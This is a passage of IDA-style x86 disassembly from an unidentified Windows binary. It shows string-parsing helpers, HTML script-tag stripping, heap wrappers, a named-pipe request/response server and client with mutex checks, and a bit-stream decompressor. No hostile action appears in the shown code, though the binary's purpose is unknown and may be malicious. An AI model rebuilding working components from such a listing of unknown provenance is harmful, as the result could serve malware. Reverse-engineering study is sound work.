sub eax, edi
jz short loc_41A4B0
jmp loc_41A564
; ---------------------------------------------------------------------------
loc_41A4CB: ; CODE XREF: sub_41A493+F�j
cmp esi, 0FFFFFFFFh
jz short loc_41A4D8
cmp eax, esi
jnz loc_41A562
loc_41A4D8: ; CODE XREF: sub_41A493+3B�j
test eax, eax
jz loc_41A562
loc_41A4E0: ; CODE XREF: sub_41A493+13�j
test esi, esi
jz short loc_41A562
mov edx, [ebp+arg_0]
mov edi, [ebp+arg_4]
mov ecx, eax
inc ecx
add eax, edx
neg ecx
sbb ecx, ecx
and ecx, eax
mov eax, esi
inc eax
add esi, edi
neg eax
sbb eax, eax
and eax, esi
jmp short loc_41A522
; ---------------------------------------------------------------------------
loc_41A502: ; CODE XREF: sub_41A493+91�j
cmp edi, eax
jz short loc_41A526
test ecx, ecx
jnz short loc_41A50E
cmp [edx], cl
jz short loc_41A53F
loc_41A50E: ; CODE XREF: sub_41A493+75�j
test eax, eax
jnz short loc_41A516
cmp [edi], al
jz short loc_41A526
loc_41A516: ; CODE XREF: sub_41A493+7D�j
movsx esi, byte ptr [edx]
movsx ebx, byte ptr [edi]
sub esi, ebx
jnz short loc_41A532
inc edx
inc edi
loc_41A522: ; CODE XREF: sub_41A493+6D�j
cmp edx, ecx
jnz short loc_41A502
loc_41A526: ; CODE XREF: sub_41A493+71�j
; sub_41A493+81�j
test ecx, ecx
jz short loc_41A53F
test eax, eax
jz short loc_41A551
xor eax, eax
jmp short loc_41A575
; ---------------------------------------------------------------------------
loc_41A532: ; CODE XREF: sub_41A493+8B�j
test esi, esi
jl short loc_41A54C
xor eax, eax
test esi, esi
setnle al
jmp short loc_41A575
; ---------------------------------------------------------------------------
loc_41A53F: ; CODE XREF: sub_41A493+79�j
; sub_41A493+95�j
cmp edi, eax
jnz short loc_41A54C
xor eax, eax
cmp [edx], al
setnz al
jmp short loc_41A575
; ---------------------------------------------------------------------------
loc_41A54C: ; CODE XREF: sub_41A493+A1�j
; sub_41A493+AE�j
or eax, 0FFFFFFFFh
jmp short loc_41A575
; ---------------------------------------------------------------------------
loc_41A551: ; CODE XREF: sub_41A493+99�j
cmp edx, ecx
jnz short loc_41A55D
mov al, [edi]
neg al
sbb eax, eax
jmp short loc_41A575
; ---------------------------------------------------------------------------
loc_41A55D: ; CODE XREF: sub_41A493+C0�j
xor eax, eax
inc eax
jmp short loc_41A575
; ---------------------------------------------------------------------------
loc_41A562: ; CODE XREF: sub_41A493+3F�j
; sub_41A493+47�j ...
sub eax, esi
loc_41A564: ; CODE XREF: sub_41A493+1F�j
; sub_41A493+33�j
xor ecx, ecx
test eax, eax
setnle cl
neg eax
sbb eax, eax
lea ecx, [ecx+ecx-1]
and eax, ecx
loc_41A575: ; CODE XREF: sub_41A493+9D�j
; sub_41A493+AA�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41A493 endp
; =============== S U B R O U T I N E =======================================
sub_41A57A proc near ; CODE XREF: .data:0041932B�p
; .data:004193FA�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov cl, [eax]
push ebx
xor edx, edx
xor bl, bl
cmp cl, 2Dh
jnz short loc_41A58E
inc bl
jmp short loc_41A5A4
; ---------------------------------------------------------------------------
loc_41A58E: ; CODE XREF: sub_41A57A+E�j
cmp cl, 2Bh
jnz short loc_41A5A5
jmp short loc_41A5A4
; ---------------------------------------------------------------------------
loc_41A595: ; CODE XREF: sub_41A57A+30�j
cmp cl, 39h
jg short loc_41A5AC
imul edx, 0Ah
movsx ecx, cl
lea edx, [edx+ecx-30h]
loc_41A5A4: ; CODE XREF: sub_41A57A+12�j
; sub_41A57A+19�j
inc eax
loc_41A5A5: ; CODE XREF: sub_41A57A+17�j
mov cl, [eax]
cmp cl, 30h
jge short loc_41A595
loc_41A5AC: ; CODE XREF: sub_41A57A+1E�j
test bl, bl
pop ebx
jz short loc_41A5B3
neg edx
loc_41A5B3: ; CODE XREF: sub_41A57A+35�j
mov eax, edx
retn
sub_41A57A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A5B6 proc near ; CODE XREF: .data:004188E3�p
; sub_41C757+38�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
xor dl, dl
cmp eax, esi
jnb short loc_41A5DB
loc_41A5C6: ; CODE XREF: sub_41A5B6+1F�j
mov cl, [eax]
cmp cl, 20h
jz short loc_41A5D2
cmp cl, 9
jnz short loc_41A5D7
loc_41A5D2: ; CODE XREF: sub_41A5B6+15�j
inc eax
cmp eax, esi
jb short loc_41A5C6
loc_41A5D7: ; CODE XREF: sub_41A5B6+1A�j
cmp eax, esi
jb short loc_41A5DF
loc_41A5DB: ; CODE XREF: sub_41A5B6+E�j
xor al, al
jmp short loc_41A630
; ---------------------------------------------------------------------------
loc_41A5DF: ; CODE XREF: sub_41A5B6+23�j
mov cl, [eax]
cmp cl, 22h
jz short loc_41A5EB
cmp cl, 27h
jnz short loc_41A5EE
loc_41A5EB: ; CODE XREF: sub_41A5B6+2E�j
mov dl, cl
inc eax
loc_41A5EE: ; CODE XREF: sub_41A5B6+33�j
mov ecx, [ebp+arg_8]
push edi
mov [ecx], eax
jmp short loc_41A61B
; ---------------------------------------------------------------------------
loc_41A5F6: ; CODE XREF: sub_41A5B6+67�j
test dl, dl
jz short loc_41A604
movsx ecx, byte ptr [eax]
movzx edi, dl
cmp ecx, edi
jmp short loc_41A618
; ---------------------------------------------------------------------------
loc_41A604: ; CODE XREF: sub_41A5B6+42�j
mov cl, [eax]
cmp cl, 20h
jz short loc_41A627
cmp cl, 9
jz short loc_41A627
cmp cl, 22h
jz short loc_41A627
cmp cl, 27h
loc_41A618: ; CODE XREF: sub_41A5B6+4C�j
jz short loc_41A627
inc eax
loc_41A61B: ; CODE XREF: sub_41A5B6+3E�j
cmp eax, esi
jb short loc_41A5F6
test dl, dl
jz short loc_41A627
xor al, al
jmp short loc_41A62F
; ---------------------------------------------------------------------------
loc_41A627: ; CODE XREF: sub_41A5B6+53�j
; sub_41A5B6+58�j ...
mov ecx, [ebp+arg_C]
dec eax
mov [ecx], eax
mov al, 1
loc_41A62F: ; CODE XREF: sub_41A5B6+6F�j
pop edi
loc_41A630: ; CODE XREF: sub_41A5B6+27�j
pop esi
pop ebp
retn
sub_41A5B6 endp
; =============== S U B R O U T I N E =======================================
sub_41A633 proc near ; CODE XREF: .data:0041918C�p
; .data:004191CE�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
mov eax, [esp+arg_0]
jmp short loc_41A640
; ---------------------------------------------------------------------------
loc_41A639: ; CODE XREF: sub_41A633+11�j
cmp cl, [esp+arg_4]
jz short locret_41A648
inc eax
loc_41A640: ; CODE XREF: sub_41A633+4�j
mov cl, [eax]
test cl, cl
jnz short loc_41A639
xor eax, eax
locret_41A648: ; CODE XREF: sub_41A633+A�j
retn
sub_41A633 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A649 proc near ; CODE XREF: sub_41E71F+37B�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
cmp edi, ebx
mov [ebp+var_C], ebx
mov [ebp+var_2], bl
mov [ebp+var_10], ebx
mov [ebp+var_8], ebx
jbe loc_41A7B9
push esi
loc_41A66B: ; CODE XREF: sub_41A649+169�j
cmp [ebp+var_C], 0
mov esi, [ebp+arg_0]
jz short loc_41A682
cmp byte ptr [ebx+esi], 3Eh
jnz short loc_41A682
dec [ebp+var_C]
jmp loc_41A7A9
; ---------------------------------------------------------------------------
loc_41A682: ; CODE XREF: sub_41A649+29�j
; sub_41A649+2F�j
mov al, [ebx+esi]
cmp al, 3Ch
jnz loc_41A758
mov eax, [ebp+var_C]
inc [ebp+var_C]
test eax, eax
jnz loc_41A7A9
sub edi, ebx
cmp [ebp+var_2], al
lea esi, [ebx+esi+1]
jz short loc_41A6D7
cmp edi, 7
jbe loc_41A7A9
cmp byte ptr [esi], 2Fh
jnz loc_41A7A9
push 6
push offset aScript ; "script"
inc esi
push esi
call dword_40FC74
test eax, eax
jnz loc_41A7A9
mov [ebp+var_2], al
jmp loc_41A7A9
; ---------------------------------------------------------------------------
loc_41A6D7: ; CODE XREF: sub_41A649+5B�j
cmp edi, 6
jbe short loc_41A6F7
push 6
push offset aScript ; "script"
push esi
call dword_40FC74
test eax, eax
jnz short loc_41A6F7
mov [ebp+var_2], 1
jmp loc_41A7A9
; ---------------------------------------------------------------------------
loc_41A6F7: ; CODE XREF: sub_41A649+91�j
; sub_41A649+A3�j
mov [ebp+var_1], 0
loc_41A6FB: ; CODE XREF: sub_41A649+F0�j
movzx eax, [ebp+var_1]
lea ebx, dword_403158[eax]
movzx ecx, byte ptr [ebx]
cmp edi, ecx
jbe short loc_41A732
push ecx
push ds:off_403148[eax*4]
push esi
call dword_40FC74
test eax, eax
jnz short loc_41A732
movzx eax, byte ptr [ebx]
add esi, eax
mov al, [esi]
cmp al, 2Fh
jz short loc_41A740
cmp al, 20h
jz short loc_41A740
cmp al, 3Eh
jz short loc_41A740
loc_41A732: ; CODE XREF: sub_41A649+C1�j
; sub_41A649+D4�j
inc [ebp+var_1]
cmp [ebp+var_1], 4
jb short loc_41A6FB
mov ebx, [ebp+var_10]
jmp short loc_41A7A9
; ---------------------------------------------------------------------------
loc_41A740: ; CODE XREF: sub_41A649+DF�j
; sub_41A649+E3�j ...
movzx eax, [ebp+var_1]
mov al, ds:byte_40315C[eax]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov ebx, [ebp+var_10]
mov [edx+ecx], al
jmp short loc_41A7A6
; ---------------------------------------------------------------------------
loc_41A758: ; CODE XREF: sub_41A649+3E�j
cmp [ebp+var_C], 0
jnz short loc_41A7A9
cmp [ebp+var_2], 0
jnz short loc_41A7A9
cmp al, 0Dh
jz short loc_41A7A9
cmp al, 0Ah
jz short loc_41A7A9
cmp al, 9
jz short loc_41A7A9
cmp al, 26h
jnz short loc_41A79D
sub edi, ebx
cmp edi, 5
jbe short loc_41A79D
push 5
push offset dword_403164
lea eax, [ebx+esi+1]
push eax
call dword_40FC74
test eax, eax
jnz short loc_41A79D
mov eax, [ebp+var_8]
mov byte ptr [eax+esi], 20h
add ebx, 5
jmp short loc_41A7A6
; ---------------------------------------------------------------------------
loc_41A79D: ; CODE XREF: sub_41A649+129�j
; sub_41A649+130�j ...
mov al, [ebx+esi]
mov ecx, [ebp+var_8]
mov [ecx+esi], al
loc_41A7A6: ; CODE XREF: sub_41A649+10D�j
; sub_41A649+152�j
inc [ebp+var_8]
loc_41A7A9: ; CODE XREF: sub_41A649+34�j
; sub_41A649+4C�j ...
mov edi, [ebp+arg_4]
inc ebx
cmp ebx, edi
mov [ebp+var_10], ebx
jb loc_41A66B
pop esi
loc_41A7B9: ; CODE XREF: sub_41A649+1B�j
mov eax, [ebp+var_8]
sub eax, ebx
add eax, edi
pop edi
pop ebx
leave
retn
sub_41A649 endp
; =============== S U B R O U T I N E =======================================
sub_41A7C4 proc near ; CODE XREF: sub_41BD39+75�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
mov cl, [esp+arg_0]
mov al, cl
shr al, 4
and cl, 0Fh
cmp al, 9
setle dl
dec dl
and dl, 7
add dl, 30h
add dl, al
mov eax, [esp+arg_4]
mov [eax], dl
cmp cl, 9
setle dl
dec dl
and dl, 7
add dl, 30h
add dl, cl
mov [eax+1], dl
retn
sub_41A7C4 endp
; =============== S U B R O U T I N E =======================================
sub_41A7F9 proc near ; CODE XREF: sub_41DCA5+1E5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
cmp [esp+arg_4], eax
jbe short loc_41A819
loc_41A801: ; CODE XREF: sub_41A7F9+1E�j
mov ecx, [esp+arg_0]
mov cl, [eax+ecx]
cmp cl, 30h
jl short loc_41A81C
cmp cl, 39h
jg short loc_41A81C
inc eax
cmp eax, [esp+arg_4]
jb short loc_41A801
loc_41A819: ; CODE XREF: sub_41A7F9+6�j
mov al, 1
retn
; ---------------------------------------------------------------------------
loc_41A81C: ; CODE XREF: sub_41A7F9+12�j
; sub_41A7F9+17�j
xor al, al
retn
sub_41A7F9 endp
; =============== S U B R O U T I N E =======================================
sub_41A81F proc near ; CODE XREF: sub_414785+97�p
; sub_414B1B+71�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jbe short loc_41A83A
add eax, 2
push eax
push 8
push dword_40FCB4
call dword_40FDCC ; RtlAllocateHeap
retn
; ---------------------------------------------------------------------------
loc_41A83A: ; CODE XREF: sub_41A81F+6�j
xor eax, eax
retn
sub_41A81F endp
; =============== S U B R O U T I N E =======================================
sub_41A83D proc near ; CODE XREF: sub_414785+73�p
; sub_414785+147�p ...
arg_0 = dword ptr 4
cmp [esp+arg_0], 0
jz short locret_41A856
push [esp+arg_0]
push 0
push dword_40FCB4
call dword_40FDD4 ; RtlFreeHeap
locret_41A856: ; CODE XREF: sub_41A83D+5�j
retn
sub_41A83D endp
; =============== S U B R O U T I N E =======================================
sub_41A857 proc near ; CODE XREF: sub_41512C+6F�p
; sub_415B4A+72�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
test esi, esi
jbe short loc_41A873
mov ecx, [esp+4+arg_0]
mov eax, [esp+4+arg_4]
sub eax, ecx
loc_41A86A: ; CODE XREF: sub_41A857+1A�j
mov dl, [eax+ecx]
mov [ecx], dl
inc ecx
dec esi
jnz short loc_41A86A
loc_41A873: ; CODE XREF: sub_41A857+7�j
pop esi
retn
sub_41A857 endp
; =============== S U B R O U T I N E =======================================
sub_41A875 proc near ; CODE XREF: .data:00418802�p
; .data:00418820�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_8]
push edi
mov edi, [esp+8+arg_0]
push esi
push [esp+0Ch+arg_4]
push edi
call sub_41A857
add esp, 0Ch
lea eax, [edi+esi]
pop edi
pop esi
retn
sub_41A875 endp
; =============== S U B R O U T I N E =======================================
sub_41A893 proc near ; CODE XREF: sub_416BA4+1D�p
; .data:0041D17B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
call sub_41A81F
mov esi, eax
test esi, esi
pop ecx
jnz short loc_41A8A6
pop esi
retn
; ---------------------------------------------------------------------------
loc_41A8A6: ; CODE XREF: sub_41A893+F�j
push [esp+4+arg_4]
push [esp+8+arg_0]
push esi
call sub_41A857
add esp, 0Ch
mov eax, esi
pop esi
retn
sub_41A893 endp
; =============== S U B R O U T I N E =======================================
sub_41A8BB proc near ; CODE XREF: sub_41BE72+A�p
; sub_41DCA5+316�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
test eax, eax
jz short locret_41A8D1
loc_41A8C3: ; CODE XREF: sub_41A8BB+14�j
mov cl, [esp+arg_4]
mov edx, [esp+arg_0]
dec eax
mov [edx+eax], cl
jnz short loc_41A8C3
locret_41A8D1: ; CODE XREF: sub_41A8BB+6�j
retn
sub_41A8BB endp
; =============== S U B R O U T I N E =======================================
sub_41A8D2 proc near ; CODE XREF: sub_41549E+AE�p
; sub_41555A+EA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_0]
test edi, edi
jz short loc_41A8FF
push esi
mov esi, [esp+8+arg_4]
test esi, esi
jz short loc_41A8FE
loc_41A8E4: ; CODE XREF: sub_41A8D2+23�j
dec esi
mov eax, [edi+esi*4]
test eax, eax
jz short loc_41A8F3
push eax
call sub_41A83D
pop ecx
loc_41A8F3: ; CODE XREF: sub_41A8D2+18�j
test esi, esi
jnz short loc_41A8E4
push edi
call sub_41A83D
pop ecx
loc_41A8FE: ; CODE XREF: sub_41A8D2+10�j
pop esi
loc_41A8FF: ; CODE XREF: sub_41A8D2+7�j
pop edi
retn
sub_41A8D2 endp
; =============== S U B R O U T I N E =======================================
sub_41A901 proc near ; CODE XREF: sub_41AAD0+1D�p
; sub_41BE85+14�p
arg_0 = dword ptr 4
push esi
mov esi, eax
push offset a_Pipe ; "\\\\.\\pipe\\"
push esi
call dword_40FD98 ; lstrcpyW
push [esp+4+arg_0]
add esi, 12h
push esi
call dword_40FD98 ; lstrcpyW
pop esi
retn
sub_41A901 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
mov esi, [ebp+8]
push edi
push dword ptr [esi+10h]
xor edi, edi
push edi
push offset dword_40FD24
call dword_40FD7C ; CreateMutexW
push dword ptr [esi+8]
mov [ebp-10h], eax
call dword_40FDBC ; SetEvent
push dword ptr [esi]
call dword_40FE08 ; DisconnectNamedPipe
push edi
push dword ptr [esi+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz loc_41AA94
push ebx
push 4
pop ebx
loc_41A966: ; CODE XREF: .data:0041AA8D�j
push edi
push dword ptr [esi]
call dword_40FDD8 ; ConnectNamedPipe
cmp eax, 1
jnz loc_41AA81
push edi
lea eax, [ebp-4]
push eax
push ebx
lea eax, [ebp-8]
push eax
push dword ptr [esi]
mov [ebp-8], edi
mov [ebp-4], edi
mov [ebp-0Ch], edi
mov [ebp+8], edi
call dword_40FDF4 ; ReadFile
test eax, eax
jz loc_41AA70
cmp [ebp-4], ebx
jnz loc_41AA70
push edi
lea eax, [ebp-4]
push eax
push ebx
lea eax, [ebp+8]
push eax
push dword ptr [esi]
call dword_40FDF4 ; ReadFile
test eax, eax
jz loc_41AA70
cmp [ebp-4], ebx
jnz loc_41AA70
cmp dword ptr [ebp+8], 0A00000h
jbe short loc_41A9D6
mov [ebp+8], edi
loc_41A9D6: ; CODE XREF: .data:0041A9D1�j
cmp [ebp+8], edi
jbe short loc_41AA0C
push dword ptr [ebp+8]
call sub_41A81F
cmp eax, edi
pop ecx
mov [ebp-0Ch], eax
jz loc_41AA70
push edi
lea ecx, [ebp-4]
push ecx
push dword ptr [ebp+8]
push eax
push dword ptr [esi]
call dword_40FDF4 ; ReadFile
test eax, eax
jz short loc_41AA70
mov eax, [ebp-4]
cmp eax, [ebp+8]
jnz short loc_41AA70
loc_41AA0C: ; CODE XREF: .data:0041A9D9�j
lea eax, [ebp+8]
push eax
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-8]
call dword ptr [esi+0Ch]
add esp, 0Ch
push edi
mov [ebp-8], eax
lea eax, [ebp-4]
push eax
push ebx
lea eax, [ebp-8]
push eax
push dword ptr [esi]
call dword_40FDF0 ; WriteFile
cmp dword ptr [ebp+8], 0A00000h
jbe short loc_41AA3E
mov [ebp+8], edi
loc_41AA3E: ; CODE XREF: .data:0041AA39�j
push edi
lea eax, [ebp-4]
push eax
push ebx
lea eax, [ebp+8]
push eax
push dword ptr [esi]
call dword_40FDF0 ; WriteFile
cmp [ebp+8], edi
jz short loc_41AA68
push edi
lea eax, [ebp-4]
push eax
push dword ptr [ebp+8]
push dword ptr [ebp-0Ch]
push dword ptr [esi]
call dword_40FDF0 ; WriteFile
loc_41AA68: ; CODE XREF: .data:0041AA53�j
push dword ptr [esi]
call dword_40FE00 ; FlushFileBuffers
loc_41AA70: ; CODE XREF: .data:0041A998�j
; .data:0041A9A1�j ...
push dword ptr [ebp-0Ch]
call sub_41A83D
pop ecx
push dword ptr [esi]
call dword_40FE08 ; DisconnectNamedPipe
loc_41AA81: ; CODE XREF: .data:0041A972�j
push edi
push dword ptr [esi+4]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jnz loc_41A966
pop ebx
loc_41AA94: ; CODE XREF: .data:0041A95C�j
push dword ptr [ebp-10h]
call dword_40FDAC ; CloseHandle
push dword ptr [esi+8]
call dword_40FDBC ; SetEvent
pop edi
xor eax, eax
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_41AAAE proc near ; CODE XREF: .data:004167F4�p
; .data:00416889�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 1F0001h
call dword_40FD80 ; OpenMutexW
test eax, eax
jnz short loc_41AAC6
xor al, al
retn
; ---------------------------------------------------------------------------
loc_41AAC6: ; CODE XREF: sub_41AAAE+13�j
push eax
call dword_40FDAC ; CloseHandle
mov al, 1
retn
sub_41AAAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AAD0 proc near ; CODE XREF: sub_414A0E+2D�p
; sub_414A0E+72�p ...
var_218 = byte ptr -218h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 218h
or [ebp+var_10], 0FFFFFFFFh
push ebx
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_218]
mov [ebp+var_1], 1
call sub_41A901
pop ecx
xor ebx, ebx
mov esi, 0C0000000h
jmp short loc_41AB17
; ---------------------------------------------------------------------------
loc_41AAFC: ; CODE XREF: sub_41AAD0+61�j
cmp [ebp+var_1], bl
jz loc_41AC31
push 0FFFFFFFFh
lea eax, [ebp+var_218]
push eax
call dword_40FDDC ; WaitNamedPipeW
mov [ebp+var_1], bl
loc_41AB17: ; CODE XREF: sub_41AAD0+2A�j
push ebx
push ebx
push 3
push ebx
push 3
push esi
lea eax, [ebp+var_218]
push eax
call dword_40FDC0 ; CreateFileW
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41AAFC
push ebx
push ebx
lea eax, [ebp+var_8]
push eax
push edi
mov [ebp+var_8], 2
call dword_40FDE0 ; SetNamedPipeHandleState
test eax, eax
jz loc_41AC2A
push ebx
lea eax, [ebp+var_8]
push eax
push 4
pop esi
push esi
lea eax, [ebp+arg_4]
push eax
push edi
call dword_40FDF0 ; WriteFile
test eax, eax
jz loc_41AC2A
push ebx
lea eax, [ebp+var_8]
push eax
push esi
lea eax, [ebp+arg_14]
push eax
push edi
call dword_40FDF0 ; WriteFile
test eax, eax
jz loc_41AC2A
push ebx
lea eax, [ebp+var_8]
push eax
push [ebp+arg_14]
push [ebp+arg_10]
push edi
call dword_40FDF0 ; WriteFile
test eax, eax
jz loc_41AC2A
push ebx
lea eax, [ebp+var_8]
push eax
push esi
lea eax, [ebp+var_10]
push eax
push edi
call dword_40FDF4 ; ReadFile
test eax, eax
jz short loc_41AC2A
cmp [ebp+var_8], esi
jnz short loc_41AC2A
push ebx
lea eax, [ebp+var_8]
push eax
push esi
lea eax, [ebp+var_C]
push eax
push edi
mov [ebp+var_C], ebx
call dword_40FDF4 ; ReadFile
test eax, eax
jz short loc_41AC26
cmp [ebp+var_8], esi
jnz short loc_41AC26
cmp [ebp+var_C], ebx
jbe short loc_41AC2A
push [ebp+var_C]
call sub_41A81F
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_41AC19
push ebx
lea eax, [ebp+var_8]
push eax
push [ebp+var_C]
push esi
push edi
call dword_40FDF4 ; ReadFile
test eax, eax
jz short loc_41AC19
mov edx, [ebp+var_C]
cmp edx, [ebp+var_8]
jnz short loc_41AC19
mov ecx, [ebp+arg_8]
cmp ecx, ebx
jz short loc_41AC1D
mov eax, [ebp+arg_C]
cmp eax, ebx
jz short loc_41AC1D
mov [ecx], esi
mov [eax], edx
jmp short loc_41AC2A
; ---------------------------------------------------------------------------
loc_41AC19: ; CODE XREF: sub_41AAD0+117�j
; sub_41AAD0+12B�j ...
or [ebp+var_10], 0FFFFFFFFh
loc_41AC1D: ; CODE XREF: sub_41AAD0+13A�j
; sub_41AAD0+141�j
push esi
call sub_41A83D
pop ecx
jmp short loc_41AC2A
; ---------------------------------------------------------------------------
loc_41AC26: ; CODE XREF: sub_41AAD0+FE�j
; sub_41AAD0+103�j
or [ebp+var_10], 0FFFFFFFFh
loc_41AC2A: ; CODE XREF: sub_41AAD0+79�j
; sub_41AAD0+95�j ...
push edi
call dword_40FDAC ; CloseHandle
loc_41AC31: ; CODE XREF: sub_41AAD0+2F�j
mov eax, [ebp+var_10]
pop edi
pop esi
pop ebx
leave
retn
sub_41AAD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AC39 proc near ; CODE XREF: sub_41AFF9+37�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_C]
mov esi, [esi]
xor edx, edx
xor ecx, ecx
push edi
xor eax, eax
mov [ebp+var_8], edx
mov [ebp+var_14], 1
mov [ebp+var_10], esi
loc_41AC5D: ; CODE XREF: sub_41AC39+6F�j
test ecx, ecx
jbe short loc_41AC6B
dec ecx
mov esi, eax
shr esi, cl
and esi, 1
jmp short loc_41AC79
; ---------------------------------------------------------------------------
loc_41AC6B: ; CODE XREF: sub_41AC39+26�j
mov eax, [edx+ebx]
push 1Fh
mov esi, eax
add edx, 4
pop ecx
shr esi, 1Fh
loc_41AC79: ; CODE XREF: sub_41AC39+30�j
test esi, esi
mov [ebp+var_4], ecx
jz short loc_41ACAA
cmp edx, [ebp+arg_4]
jnb loc_41AE46
mov ecx, [ebp+var_10]
cmp [ebp+var_8], ecx
jnb loc_41AE55
mov cl, [edx+ebx]
mov esi, [ebp+var_8]
mov edi, [ebp+arg_8]
inc [ebp+var_8]
mov [esi+edi], cl
inc edx
loc_41ACA5: ; CODE XREF: sub_41AC39+208�j
mov ecx, [ebp+var_4]
jmp short loc_41AC5D
; ---------------------------------------------------------------------------
loc_41ACAA: ; CODE XREF: sub_41AC39+45�j
mov [ebp+var_C], 1
loc_41ACB1: ; CODE XREF: sub_41AC39+D0�j
test ecx, ecx
jbe short loc_41ACBF
dec ecx
mov esi, eax
shr esi, cl
and esi, 1
jmp short loc_41ACCD
; ---------------------------------------------------------------------------
loc_41ACBF: ; CODE XREF: sub_41AC39+7A�j
mov eax, [edx+ebx]
push 1Fh
mov esi, eax
add edx, 4
pop ecx
shr esi, 1Fh
loc_41ACCD: ; CODE XREF: sub_41AC39+84�j
cmp edx, [ebp+arg_4]
mov edi, [ebp+var_C]
lea esi, [esi+edi*2]
mov [ebp+var_C], esi
jnb loc_41AE46
cmp esi, 1000002h
ja loc_41AE5C
test ecx, ecx
jbe short loc_41ACF9
dec ecx
mov esi, eax
shr esi, cl
and esi, 1
jmp short loc_41AD07
; ---------------------------------------------------------------------------
loc_41ACF9: ; CODE XREF: sub_41AC39+B4�j
mov eax, [edx+ebx]
push 1Fh
mov esi, eax
add edx, 4
pop ecx
shr esi, 1Fh
loc_41AD07: ; CODE XREF: sub_41AC39+BE�j
test esi, esi
jz short loc_41ACB1
mov edi, [ebp+var_C]
cmp edi, 2
jnz short loc_41AD18
mov esi, [ebp+var_14]
jmp short loc_41AD3B
; ---------------------------------------------------------------------------
loc_41AD18: ; CODE XREF: sub_41AC39+D8�j
cmp edx, [ebp+arg_4]
jnb loc_41AE46
movzx esi, byte ptr [edx+ebx]
add edi, 0FFFFFFFDh
shl edi, 8
add esi, edi
inc edx
cmp esi, 0FFFFFFFFh
jz loc_41AE63
inc esi
mov [ebp+var_14], esi
loc_41AD3B: ; CODE XREF: sub_41AC39+DD�j
test ecx, ecx
mov [ebp+var_C], esi
jbe short loc_41AD4C
dec ecx
mov edi, eax
shr edi, cl
and edi, 1
jmp short loc_41AD5A
; ---------------------------------------------------------------------------
loc_41AD4C: ; CODE XREF: sub_41AC39+107�j
mov eax, [edx+ebx]
push 1Fh
mov edi, eax
add edx, 4
pop ecx
shr edi, 1Fh
loc_41AD5A: ; CODE XREF: sub_41AC39+111�j
test ecx, ecx
jbe short loc_41AD6B
dec ecx
mov esi, eax
shr esi, cl
mov [ebp+var_4], ecx
and esi, 1
jmp short loc_41AD7D
; ---------------------------------------------------------------------------
loc_41AD6B: ; CODE XREF: sub_41AC39+123�j
mov eax, [edx+ebx]
mov esi, eax
add edx, 4
mov [ebp+var_4], 1Fh
shr esi, 1Fh
loc_41AD7D: ; CODE XREF: sub_41AC39+130�j
lea edi, [esi+edi*2]
test edi, edi
jnz short loc_41ADEE
inc edi
loc_41AD85: ; CODE XREF: sub_41AC39+1B1�j
cmp [ebp+var_4], 0
jbe short loc_41AD9A
dec [ebp+var_4]
mov ecx, [ebp+var_4]
mov esi, eax
shr esi, cl
and esi, 1
jmp short loc_41ADAC
; ---------------------------------------------------------------------------
loc_41AD9A: ; CODE XREF: sub_41AC39+150�j
mov eax, [edx+ebx]
mov esi, eax
add edx, 4
mov [ebp+var_4], 1Fh
shr esi, 1Fh
loc_41ADAC: ; CODE XREF: sub_41AC39+15F�j
cmp edx, [ebp+arg_4]
lea edi, [esi+edi*2]
jnb loc_41AE46
cmp edi, [ebp+var_10]
jnb loc_41AE55
cmp [ebp+var_4], 0
jbe short loc_41ADD6
dec [ebp+var_4]
mov ecx, [ebp+var_4]
mov esi, eax
shr esi, cl
and esi, 1
jmp short loc_41ADE8
